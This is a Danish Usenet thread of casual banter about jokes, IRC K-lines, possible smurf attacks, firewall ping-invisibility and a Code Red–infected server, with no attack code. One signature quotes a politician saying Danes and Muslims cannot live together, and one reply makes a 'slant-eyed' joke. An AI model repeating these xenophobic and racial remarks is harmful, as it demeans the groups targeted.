Vi vil altså høre det alligevel.

> Der er også klassikeren Jan Pan Skraldespand.

Den er da heller ikke særligt slem.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> Vi vil altså høre det alligevel.
>
Jamen så må du jo opsøge mine gamle medstuderende fra første til femte
eller så klasse. God fornøjelse

--
Mvh/re Jan Jonasen
jonasen (at) it (dot) dk

If I wanted culture, I'd eat yogurt.

---

In article <1f06zrb.ojlpd11fi7zr6N%jonasenREMOVE@THISit.dk>,
jonasenREMOVE@THISit.dk (Jan Oksfeldt Jonasen) wrote:

> Jamen så må du jo opsøge mine gamle medstuderende fra første til femte
> eller så klasse. God fornøjelse

Det lyder alt alt for besværligt.

Kan du ikke huske hvilken klasse du gik ud af?

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Thomas Boelskifte <engineering@boelskifte.dk> wrote:

> Jesper <triton@titancity.com> wrote:
>
> > Thomas Boelskifte <engineering@boelskifte.dk> wrote:
>
> > > K-lined - det lyder ikke rart!
> > >
> > > <http://www2.pacfusion.com/sg/TS/faq/0,1246,116,00.html>
> > >
> > > Nå, det kan jo være det ikke er mig, jeg er jo også så flink så hvem
> > > ville banne mig
> >
> > Det kan være fordi din adresse har været anvendt i et smurf- eller
> > fraggleangreb på den eller de IRC servere der K-Liner dig. Det kræver
> > ikke din aktive medvirken, men hvis ikke du er pingusynlig på nettet
> > (hardware firewalls og NetBarrier software firewall kan give dig
> > pingusynlighed) så kan din maskine bruges til at bounce ICMP pakker fra.
>
> AhhhhhHA!
>
> Ja når jeg kigger i loggen efter jeg har været på IRC, så kan jeg godt
> se at der er nogen af "vennerne" der har sniffet til mine porte (Edlich,
> ingen morsomheder tak :)

Ja, de er morsomme på IRC!
>
> Så det er da muligt, jeg er dog un-K-lined igen, uden at have brokket
> mig. Sikkert en fejl.

Normalt er en K Lining tidsbegræset.
>
> Men NetBarrier siger du, den har jeg brugt førhen. Norton Personal
> Firewall kan ikke lave pingusynlighed, eller hur?

Hverken Norton Personal Firewall eller DoorStop kan lave pingusynlighed.
>
> Lad os sige at jeg går tilbage til NetBarrier, hvilke ulemper giver
> pingusynlighed så. Der er vel en bagside
>
Visse typer af serveroperationer kræver at pingsvar, f.eks. AppleShare
IP, visse udbydere og deres servere checker klienten med ping.

--
Jesper. »Vi danskere er med vores kristne-lutheranske
kulturarv så forskellige fra muslimerne, at vi må erkende,
at vi ikke kan leve sammen.«
Sven Bergstein, Pens. Oberstløjtnant, medlem af CD

---

In article <1f006ju.uqklirhqu1s4N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> (Edlich, ingen morsomheder tak :)

Øv.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f006ju.uqklirhqu1s4N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > (Edlich, ingen morsomheder tak :)
>
> Øv.

Århh så skidt da!


Mojn, Thomas :)

---

In article <1f0094y.zng1y51d2tbg8N%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Århh så skidt da!

Tak.

Da jeg har hørt om hende Irene Regitze Carlsen, kan jeg godt forstå at
"vennerne" har ville sikre sig at hun havde slettet sporene efter deres
egen missioner. Da de pga uhøvisk omtale af frk Carlsen er forment
adgang til hendes interessesfære, er det helt naturligt at de har
sniffet til dine porte i stedet for.

Det er her interessant, at tilstedeværelsen af dit webcam er blevet
opsnuset af bagmændene til "Me, Myself and Irene" - hvordan i alverden
skulle de ellers have fået ideen til dildo scenen?
Bare ærgerligt at de udelod snuseriet, det er jo nærmest historie
forfalskning. Får i forresten royalities fra filmen?

Ahhh, det lettede. Thomas, den slags må du aldrig mere formene mig, jeg
får hovedpine og alt muligt af indestængte fjollerier.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1f0094y.zng1y51d2tbg8N%engineering@boelskifte.dk>,
> engineering@boelskifte.dk (Thomas Boelskifte) wrote:
>
> > Århh så skidt da!


> Det er her interessant, at tilstedeværelsen af dit webcam er blevet
> opsnuset af bagmændene til "Me, Myself and Irene" - hvordan i alverden
> skulle de ellers have fået ideen til dildo scenen?

ROTFL!!!!!!!!!!

> Bare ærgerligt at de udelod snuseriet, det er jo nærmest historie
> forfalskning. Får i forresten royalities fra filmen?

> Ahhh, det lettede. Thomas, den slags må du aldrig mere formene mig, jeg
> får hovedpine og alt muligt af indestængte fjollerier.

Der beklages noget så frygteligt herfra :)

Man regndede ikke med, at De ville respektere overflyvnings-forbudet :)

Skal aldrig ske igen!



Mojn, Thomas

---

In article <1f00en9.1xib63n1nd4iwwN%engineering@boelskifte.dk>,
engineering@boelskifte.dk (Thomas Boelskifte) wrote:

> Man regndede ikke med, at De ville respektere overflyvnings-forbudet :)

Jeg er skam en lovlydig borger.

> Skal aldrig ske igen!

Tak.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> www.winart.dk bruger MS IIS til webservering, så grunden til at den har
> besøgt dig, er sandsynligvis, at den er blevet smittet af noget rød kode.

Vidste ikke at de skide kommunister kunne programmere.

--
Mvh/re Jan Jonasen
jonasen (at) it (dot) dk

If I wanted culture, I'd eat yogurt.

---

In article <1ezzx0e.vpqxa91q09a3fN%jonasenREMOVE@THISit.dk>,
jonasenREMOVE@THISit.dk (Jan Oksfeldt Jonasen) wrote:

> Vidste ikke at de skide kommunister kunne programmere.

Ork jo, hvem husker ikke Tetris?

Der var garanteret hemmelige budskaber kodet ind i rækkefølgen klodserne
dalede ned på.

--
MVH Martin Edlich
Henvendelser til min e-mail adresse vil blive besvaret kort, men uhøfligt
(medmindre jeg selv er ude om det, og det er Off Topic).
http://www.edlich.dk

---

Martin Edlich <newsspam3@mail.edlich.dk> wrote:

> In article <1ezzx0e.vpqxa91q09a3fN%jonasenREMOVE@THISit.dk>,
> jonasenREMOVE@THISit.dk (Jan Oksfeldt Jonasen) wrote:
>
> > Vidste ikke at de skide kommunister kunne programmere.
>
> Ork jo, hvem husker ikke Tetris?
>
> Der var garanteret hemmelige budskaber kodet ind i rækkefølgen klodserne
> dalede ned på.

Jeg blev i hvert fald "skævøjet" af det



Mojn, Thomas

---

Thomas Boelskifte <engineering@boelskifte.dk> wrote:

> Jeg blev i hvert fald "skævøjet" af det
>
*Meget tør latter*


--
Mvh/re Jan Jonasen
jonasen (at) it (dot) dk

If I wanted culture, I'd eat yogurt.